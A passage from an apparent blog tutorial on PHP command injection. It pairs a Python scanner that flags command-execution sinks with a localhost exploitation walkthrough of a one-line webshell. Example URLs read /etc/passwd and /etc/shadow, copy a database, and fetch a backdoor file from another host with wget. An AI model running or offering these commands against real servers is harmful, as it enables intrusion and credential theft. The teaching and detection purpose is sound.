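# Where attacker-controlled data enters a PHP script.
SOURCES = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE", "$_SERVER", "$argv")

SINK_CALL = re.compile(r"\b(?:%s)\s*\(" % "|".join(SINKS), re.IGNORECASE)
BACKTICKS = re.compile(r"`[^`]*`")

def scan_php(source):
    """Return (line_no, severity, stripped_line) for each command-execution sink.

    severity is 'high' when a request superglobal sits in the same statement,
    otherwise 'review': the argument may still be tainted through an earlier
    assignment, which this line-by-line check cannot see. A real tool needs
    data-flow analysis; this is the triage you do before reading the file.
    """
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        code = line.split("//")[0]        # crude: drops // comments (and anything after "://")
        if SINK_CALL.search(code) or BACKTICKS.search(code):
            tainted = any(src in code for src in SOURCES)
            findings.append((no, "high" if tainted else "review", line.strip()))
    return findings

# Constructed sample page: the post's one-liner plus a few neighbours.
SAMPLE_PHP = """<?php
// constructed sample, not the post's full page
system($_REQUEST['cmd']);                  // line 3: request data straight into the sink
$host = $_GET['host'];
echo shell_exec("ping -c 1 " . $host);    // line 5: tainted through $host, needs data flow
echo `uptime`;                             // line 6: backtick operator
system('date');                            // line 7: constant argument
// system($_GET['x']);                     // line 8: commented out, ignored
?>"""

if __name__ == "__main__":
    for no, severity, text in scan_php(SAMPLE_PHP):
        print("%s:%d: %s" % (severity, no, text))
```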






Exploitation:

Note: doing it on localhost

http://localhost/vultest/lame.php?cmd=ls

It outputs:


db.php
lame.php
login.php
password.txt
test1


We can run any command:


http://localhost/vultest/lame.php?cmd=cat /etc/passwd
http://localhost/vultest/lame.php?cmd=cat /etc/hosts
http://localhost/vultest/lame.php?cmd=cat /etc/shadow (Require root)
http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /here
http://localhost/vultest/lame.php?cmd=cat wget 192.168.1.212/bacdoor.php

etc.

I hope I explained it and now we know what it is and how it can be exploited by hackers. But really it is very basic; you need to be more advanced.

Let me know (sec00rit3y@gmail.com) if you have any questions.

Good luck!!!